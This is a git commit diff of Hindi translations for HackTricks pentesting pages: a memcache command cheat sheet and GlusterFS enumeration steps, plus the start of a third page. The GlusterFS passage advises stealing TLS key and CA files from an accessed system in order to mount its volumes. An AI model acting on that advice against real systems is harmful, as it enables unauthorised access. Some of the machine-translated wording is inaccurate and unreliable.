mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 17:28:13 +00:00
Translated ['network-services-pentesting/11211-memcache/memcache-command
This commit is contained in:
parent
672fb5b7ed
commit
b2d3341f07
7 changed files with 171 additions and 340 deletions
|
@ -1,57 +1,59 @@
|
|||
# Memcache कमांड्स
|
||||
# Memcache Commands
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
|
||||
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपना योगदान दें।**
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** ट्विटर पर **फॉलो** करें 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**।**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos को PRs जमा करके।
|
||||
|
||||
</details>
|
||||
|
||||
## कमांड्स चीट-शीट
|
||||
## Commands Cheat-Sheet
|
||||
|
||||
**स्रोत से** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)\*\*\*\*
|
||||
**से** [**https://lzone.de/cheat-sheet/memcached**](https://lzone.de/cheat-sheet/memcached)
|
||||
|
||||
समर्थित कमांड्स (आधिकारिक और कुछ अनौपचारिक) [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) दस्तावेज़ में दर्ज हैं।
|
||||
समर्थित कमांड (आधिकारिक और कुछ अनौपचारिक) [doc/protocol.txt](https://github.com/memcached/memcached/blob/master/doc/protocol.txt) दस्तावेज़ में दर्ज हैं।
|
||||
|
||||
दुःख की बात है कि वाक्यांश विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांड्स की सूची देने के लिए एक साधारण मदद कमांड बेहतर होगी। यहां आपको [स्रोत](https://github.com/memcached/memcached) में पाए जाने वाले कमांड्स का एक अवलोकन है (19.08.2016 के रूप में):
|
||||
दुःख की बात है कि वाक्य-रचना विवरण वास्तव में स्पष्ट नहीं है और मौजूदा कमांड्स की सूची देने वाला एक सरल मदद कमांड बेहतर होगा। यहाँ एक अवलोकन है जिसे आप [स्रोत](https://github.com/memcached/memcached) में पा सकते हैं (19.08.2016 के रूप में):
|
||||
|
||||
| कमांड | विवरण | उदाहरण |
|
||||
| --------------------- | --------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| get | एक मान पढ़ता है | `get mykey` |
|
||||
| set | एक कुंजी को बिना शर्त के सेट करें | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Unix CLI उपकरणों का उपयोग करते समय \r\n का उपयोग करने का सुनिश्चित करें। उदाहरण के लिए</p> <code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
|
||||
| add | एक नई कुंजी जोड़ें | `add newkey 0 60 5` |
|
||||
| replace | मौजूदा कुंजी को अधिलेखित करें | `replace key 0 60 5` |
|
||||
| append | मौजूदा कुंजी में डेटा जोड़ें | `append key 0 60 15` |
|
||||
| prepend | मौजूदा कुंजी में डेटा प्रीपेंड करें | `prepend key 0 60 15` |
|
||||
| incr | दिए गए संख्यात्मक कुंजी मान को बढ़ाता है | `incr mykey 2` |
|
||||
| decr | दिए गए संख्यात्मक कुंजी मान को कम करता है | `decr mykey 5` |
|
||||
| delete | मौजूदा कुंजी को हटा देता है | `delete mykey` |
|
||||
| flush\_all | सभी आइटमों को तत्काल अमान्य करें | `flush_all` |
|
||||
| flush\_all | n सेकंड में सभी आइटमों को अमान्य करें | `flush_all 900` |
|
||||
| stats | सामान्य आंकड़े प्रिंट करें | `stats` |
|
||||
| | मेमोरी आंकड़े प्रिंट करें | `stats slabs` |
|
||||
| | उच्च स्तरीय आवंटन आंकड़े प्रिंट करें | `stats malloc` |
|
||||
| | आइटम्स पर जानकारी प्रिंट करें | `stats items` |
|
||||
| --------------------- | ----------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| get | मान पढ़ता है | `get mykey` |
|
||||
| set | एक कुंजी को अविश्वसनीय रूप से सेट करें | <p><code>set mykey <flags> <ttl> <size></code><br><br><p>Unix CLI उपकरणों का उपयोग करते समय \r\n को लाइन ब्रेक के रूप में सुनिश्चित करें। उदाहरण के लिए।<code>printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211</code></p> |
|
||||
| add | एक नई कुंजी जोड़ें | `add newkey 0 60 5` |
|
||||
| replace | मौजूदा कुंजी को अधिग्रहण करें | `replace key 0 60 5` |
|
||||
| append | मौजूदा कुंजी में डेटा जोड़ें | `append key 0 60 15` |
|
||||
| prepend | मौजूदा कुंजी में डेटा प्रीपेंड करें | `prepend key 0 60 15` |
|
||||
| incr | दिए गए संख्यात्मक कुंजी मान को बढ़ाता है | `incr mykey 2` |
|
||||
| decr | दिए गए संख्यात्मक कुंजी मान को घटाता है | `decr mykey 5` |
|
||||
| delete | मौजूदा कुंजी को हटाता है | `delete mykey` |
|
||||
| flush\_all | सभी आइटमों को तुरंत अमान्य करें | `flush_all` |
|
||||
| flush\_all | n सेकंड में सभी आइटमों को अमान्य करें | `flush_all 900` |
|
||||
| stats | सामान्य सांख्यिकी प्रिंट करें | `stats` |
|
||||
| | मेमोरी सांख्यिकी प्रिंट करें | `stats slabs` |
|
||||
| | उच्च स्तरीय आवंटन सांख्यिकी प्रिंट करें | `stats malloc` |
|
||||
| | आइटम्स पर जानकारी प्रिंट करें | `stats items` |
|
||||
| | | `stats detail` |
|
||||
| | | `stats sizes` |
|
||||
| | सांख्यिकी गणना रीसेट करें | `stats reset` |
|
||||
| lru\_crawler metadump | कैश में (सभी) आइटमों के लिए मेटाडेटा डंप करें | `lru_crawler metadump all` |
|
||||
| version | सर्वर संस्करण प्रिंट करें | `version` |
|
||||
| verbosity | लॉग स्तर बढ़ाएं | `verbosity` |
|
||||
| quit | सत्र समाप्त करें | `quit` |
|
||||
| | सांख्यिकी गणना रीसेट करें | `stats reset` |
|
||||
| lru\_crawler metadump | कैश में आइटमों के (अधिकांश) मेटाडेटा डंप करें | `lru_crawler metadump all` |
|
||||
| version | सर्वर संस्करण प्रिंट करें | `version` |
|
||||
| verbosity | लॉग स्तर बढ़ाता है | `verbosity` |
|
||||
| quit | सत्र समाप्त करें | `quit` |
|
||||
|
||||
#### ट्रैफिक सांख्यिकी <a href="#traffic-statistics" id="traffic-statistics"></a>
|
||||
|
||||
आप वर्तमान ट्रैफिक सांख्यिकी का अनुरोध कमांड का उपयोग करके कर सकते हैं
|
||||
आप वर्तमान ट्रैफिक सांख्यिकी का प्रश्न कर सकते हैं उपयोग करके
|
||||
```
|
||||
stats
|
||||
```
|
||||
आपको एक सूची मिलेगी जिसमें कनेक्शन की संख्या, इनपुट/आउटपुट में बाइट और बहुत कुछ होगा।
|
||||
आपको एक सूची मिलेगी जो कनेक्शन की संख्या, आउट/इन बाइट्स और अधिक की सेवा करेगी।
|
||||
|
||||
उदाहरण आउटपुट:
|
||||
```
|
||||
|
@ -80,113 +82,10 @@ STAT threads 1
|
|||
END
|
||||
```
|
||||
#### मेमोरी सांख्यिकी <a href="#memory-statistics" id="memory-statistics"></a>
|
||||
|
||||
आप वर्तमान मेमोरी सांख्यिकी को क्वेरी कर सकते हैं।
|
||||
```
|
||||
stats slabs
|
||||
```
|
||||
# Memcache Commands
|
||||
|
||||
Memcache is an in-memory key-value store that is commonly used for caching data in web applications. It is a distributed caching system that allows you to store and retrieve data quickly.
|
||||
|
||||
## Basic Commands
|
||||
|
||||
### SET
|
||||
|
||||
**Description:** The SET command is used to store a key-value pair in the memcache.
|
||||
|
||||
**Syntax:** `SET <key> <flags> <exptime> <bytes> [noreply]\r\n<data block>\r\n`
|
||||
|
||||
- `<key>`: The key to store the data.
|
||||
- `<flags>`: Optional flags to store additional metadata.
|
||||
- `<exptime>`: The expiration time in seconds.
|
||||
- `<bytes>`: The size of the data block in bytes.
|
||||
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
|
||||
|
||||
**Example:** `SET mykey 0 3600 5\r\nhello\r\n`
|
||||
|
||||
### GET
|
||||
|
||||
**Description:** The GET command is used to retrieve the value associated with a key from the memcache.
|
||||
|
||||
**Syntax:** `GET <key>\r\n`
|
||||
|
||||
- `<key>`: The key to retrieve the value.
|
||||
|
||||
**Example:** `GET mykey\r\n`
|
||||
|
||||
### DELETE
|
||||
|
||||
**Description:** The DELETE command is used to remove a key-value pair from the memcache.
|
||||
|
||||
**Syntax:** `DELETE <key>\r\n`
|
||||
|
||||
- `<key>`: The key to delete.
|
||||
|
||||
**Example:** `DELETE mykey\r\n`
|
||||
|
||||
## Advanced Commands
|
||||
|
||||
### INCR
|
||||
|
||||
**Description:** The INCR command is used to increment the value associated with a key in the memcache.
|
||||
|
||||
**Syntax:** `INCR <key> <value>\r\n`
|
||||
|
||||
- `<key>`: The key to increment the value.
|
||||
- `<value>`: The value to increment by.
|
||||
|
||||
**Example:** `INCR mykey 1\r\n`
|
||||
|
||||
### DECR
|
||||
|
||||
**Description:** The DECR command is used to decrement the value associated with a key in the memcache.
|
||||
|
||||
**Syntax:** `DECR <key> <value>\r\n`
|
||||
|
||||
- `<key>`: The key to decrement the value.
|
||||
- `<value>`: The value to decrement by.
|
||||
|
||||
**Example:** `DECR mykey 1\r\n`
|
||||
|
||||
### APPEND
|
||||
|
||||
**Description:** The APPEND command is used to append data to the value associated with a key in the memcache.
|
||||
|
||||
**Syntax:** `APPEND <key> <bytes> [noreply]\r\n<data block>\r\n`
|
||||
|
||||
- `<key>`: The key to append the data.
|
||||
- `<bytes>`: The size of the data block to append in bytes.
|
||||
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
|
||||
|
||||
**Example:** `APPEND mykey 5\r\nworld\r\n`
|
||||
|
||||
### PREPEND
|
||||
|
||||
**Description:** The PREPEND command is used to prepend data to the value associated with a key in the memcache.
|
||||
|
||||
**Syntax:** `PREPEND <key> <bytes> [noreply]\r\n<data block>\r\n`
|
||||
|
||||
- `<key>`: The key to prepend the data.
|
||||
- `<bytes>`: The size of the data block to prepend in bytes.
|
||||
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
|
||||
|
||||
**Example:** `PREPEND mykey 5\r\nhello\r\n`
|
||||
|
||||
### CAS
|
||||
|
||||
**Description:** The CAS command is used to check and set a value in the memcache using a unique identifier.
|
||||
|
||||
**Syntax:** `CAS <key> <flags> <exptime> <bytes> <cas unique> [noreply]\r\n<data block>\r\n`
|
||||
|
||||
- `<key>`: The key to check and set the value.
|
||||
- `<flags>`: Optional flags to store additional metadata.
|
||||
- `<exptime>`: The expiration time in seconds.
|
||||
- `<bytes>`: The size of the data block in bytes.
|
||||
- `<cas unique>`: The unique identifier for the value.
|
||||
- `[noreply]`: Optional parameter to indicate that the server should not send a response.
|
||||
|
||||
**Example:** `CAS mykey 0 3600 5 123456\r\nhello\r\n`
|
||||
उदाहरण आउटपुट:
|
||||
```
|
||||
STAT 1:chunk_size 80
|
||||
STAT 1:chunks_per_page 13107
|
||||
|
@ -207,34 +106,17 @@ STAT active_slabs 3
|
|||
STAT total_malloced 3145436
|
||||
END
|
||||
```
|
||||
यदि आपको यकीन नहीं है कि आपके मेमकैश्ड इंस्टेंस के लिए पर्याप्त मेमोरी है या नहीं, तो हमेशा "स्टैट्स" कमांड द्वारा दिए गए "इविक्शन्स" काउंटर के लिए ध्यान दें। यदि आपके पास इंस्टेंस के लिए पर्याप्त मेमोरी है, तो "इविक्शन्स" काउंटर 0 होना चाहिए या कम से कम बढ़ नहीं रहा होना चाहिए।
|
||||
#### कौन से कुंजी उपयोग में हैं? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
|
||||
|
||||
#### कौन से कीज़ उपयोग किए जाते हैं? <a href="#which-keys-are-used" id="which-keys-are-used"></a>
|
||||
|
||||
वर्तमान सेट की सीधी तरीके से निर्धारित करने के लिए कोई अंतर्निहित फ़ंक्शन नहीं है। हालांकि, आप निम्नलिखित कमांड का उपयोग कर सकते हैं।
|
||||
यदि आपको यह नहीं पता है कि आपके मेमकैश्ड इंस्टेंस के लिए पर्याप्त मेमोरी है या नहीं, तो हमेशा "स्टैट्स" कमांड द्वारा दिए गए "इविक्शन्स" काउंटर का ध्यान रखें। यदि आपके पास इंस्टेंस के लिए पर्याप्त मेमोरी है तो "इविक्शन्स" काउंटर 0 होना चाहिए या कम से कम बढ़ नहीं रहा होना चाहिए।
|
||||
```
|
||||
stats items
|
||||
```
|
||||
## Command to Determine How Many Keys Exist
|
||||
|
||||
To determine the number of keys that exist in a Memcache server, you can use the `stats` command. This command provides statistics about the server, including the total number of keys stored.
|
||||
|
||||
To execute the command, follow these steps:
|
||||
|
||||
1. Connect to the Memcache server using a Memcache client.
|
||||
2. Send the `stats` command to the server.
|
||||
3. Parse the response to extract the value of the `curr_items` field.
|
||||
|
||||
Here is an example of how to execute the command using Telnet:
|
||||
**Command to determine how many keys do exist:**
|
||||
|
||||
```bash
|
||||
$ telnet <memcache_server_ip> 11211
|
||||
stats
|
||||
stats items
|
||||
```
|
||||
|
||||
The server will respond with a list of statistics. Look for the line that starts with `STAT curr_items` and note the value after it. This value represents the number of keys currently stored in the Memcache server.
|
||||
|
||||
Keep in mind that the `stats` command provides various other statistics as well, which can be useful for monitoring and troubleshooting purposes.
|
||||
```
|
||||
stats items
|
||||
STAT items:1:number 220
|
||||
|
@ -244,16 +126,4 @@ STAT items:2:age 1405
|
|||
[...]
|
||||
END
|
||||
```
|
||||
यह कम से कम मदद करता है कि क्या कोई कुंजी का उपयोग किया जाता है। मेमकैश एक्सेस करने वाले एक PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
* क्या आप एक **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह।
|
||||
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**।
|
||||
|
||||
</details>
|
||||
यह कम से कम यह देखने में मदद करता है कि क्या कोई कुंजीयों का उपयोग हो रहा है। PHP स्क्रिप्ट से कुंजी नामों को डंप करने के लिए जो पहले से ही मेमकैश एक्सेस करता है, उसका उपयोग करने के लिए आप [100days.de](http://100days.de/serendipity/archives/55-Dumping-MemcacheD-Content-Keys-with-PHP.html) से PHP कोड का उपयोग कर सकते हैं।
|
||||
|
|
|
@ -1,61 +1,46 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **Twitter** पर 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) को **फॉलो करें**.
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# मूल जानकारी
|
||||
|
||||
**GlusterFS** एक **वितरित**, मनमाने ढंग से स्केलेबल **फाइल सिस्टम** है जो **कई सर्वरों** से स्टोरेज कॉम्पोनेंट्स को एकीकृत करता है एक समान फाइल सिस्टम में.
|
||||
**GlusterFS** एक **वितरित फ़ाइल सिस्टम** है जो कई सर्वरों से स्टोरेज को एक **एकीकृत सिस्टम** में जोड़ता है। यह **अनियमित स्केलेबिलिटी** की अनुमति देता है, जिसका मतलब है कि आप आसानी से स्टोरेज सर्वर जोड़ सकते हैं या हटा सकते हैं बिना कुल फ़ाइल सिस्टम को बाधित किए। यह आपके डेटा के लिए उच्च **उपलब्धता** और **क्षमता** सुनिश्चित करता है। GlusterFS के साथ, आप अपने फ़ाइलों तक पहुँच सकते हैं जैसे कि वे स्थानीय रूप से स्टोर किए गए हों, चाहे उपस्थित सर्वर बुनियादी हो। यह एक शक्तिशाली और लचीला समाधान प्रदान करता है बड़ी मात्रा में डेटा को कई सर्वरों पर प्रबंधित करने के लिए।
|
||||
|
||||
**डिफ़ॉल्ट पोर्ट्स**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (आगे से)\
|
||||
पोर्ट 49152 के लिए, अधिक ईंटों का उपयोग करने के लिए 1 से बढ़ा हुआ पोर्ट्स खुले होने चाहिए। _पहले 24009 पोर्ट का उपयोग 49152 के बजाय किया जाता था।_
|
||||
**डिफ़ॉल्ट पोर्ट्स**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (आगे)\
|
||||
पोर्ट 49152 के लिए, 1 से बढ़ते हुए पोर्ट्स को खोलने की आवश्यकता है अधिक bricks का उपयोग करने के लिए। _पहले पोर्ट 24009 का उपयोग 49152 के बजाय किया गया था।_
|
||||
```
|
||||
PORT STATE SERVICE
|
||||
24007/tcp open rpcbind
|
||||
49152/tcp open ssl/unknown
|
||||
```
|
||||
## परिगणना
|
||||
## जाँच
|
||||
|
||||
इस फाइल सिस्टम के साथ इंटरैक्ट करने के लिए आपको [**GlusterFS क्लाइंट**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) को इंस्टॉल करना होगा (`sudo apt-get install glusterfs-cli`).
|
||||
इस फ़ाइल सिस्टम के साथ बातचीत करने के लिए आपको [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) को इंस्टॉल करने की आवश्यकता है (`sudo apt-get install glusterfs-cli`).
|
||||
|
||||
उपलब्ध वॉल्यूम्स को सूचीबद्ध करने और माउंट करने के लिए आप इस्तेमाल कर सकते हैं:
|
||||
उपलब्ध वॉल्यूम की सूची देखने और माउंट करने के लिए आप इस्तेमाल कर सकते हैं:
|
||||
```bash
|
||||
sudo gluster --remote-host=10.10.11.131 volume list
|
||||
# This will return the name of the volumes
|
||||
|
||||
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/
|
||||
```
|
||||
यदि आपको **फाइल सिस्टम माउंट करने की कोशिश में त्रुटि** मिलती है, तो आप `/var/log/glusterfs/` में लॉग्स चेक कर सकते हैं।
|
||||
यदि आपको **फाइल सिस्टम को माउंट करने में त्रुटि** मिलती है, तो आप `/var/log/glusterfs/` में लॉग जांच सकते हैं।
|
||||
|
||||
**प्रमाणपत्रों का उल्लेख करने वाली त्रुटियां** फाइलों को चुराकर ठीक की जा सकती हैं (यदि आपके पास सिस्टम तक पहुंच है):
|
||||
**प्रमाणपत्रों का उल्लेख करने वाली त्रुटियों** को ठीक किया जा सकता है जब आप सिस्टम तक पहुंच पाते हैं और निम्नलिखित फ़ाइलें चुरा लेते हैं:
|
||||
|
||||
* /etc/ssl/glusterfs.ca
|
||||
* /etc/ssl/glusterfs.key
|
||||
* /etc/ssl/glusterfs.ca.pem
|
||||
|
||||
और उन्हें अपने मशीन के `/etc/ssl` या `/usr/lib/ssl` डायरेक्टरी में स्टोर करें (यदि अलग डायरेक्टरी का उपयोग किया जाता है तो लॉग्स में इसी तरह की पंक्तियों की जांच करें: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_")।
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**।
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
और उन्हें अपनी मशीन में `/etc/ssl` या `/usr/lib/ssl` निर्देशिका में स्टोर करें (यदि एक विभिन्न निर्देशिका का उपयोग किया गया है तो लॉग में "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" जैसी लाइनों की जांच करें)।
|
||||
|
|
|
@ -1,42 +1,44 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>शून्य से नायक तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord समूह में शामिल हों**](https://discord.gg/hRep4RUj7f) या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग तरकीबें साझा करें, HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
|
||||
* अगर आप अपनी **कंपनी को HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# मूल जानकारी
|
||||
|
||||
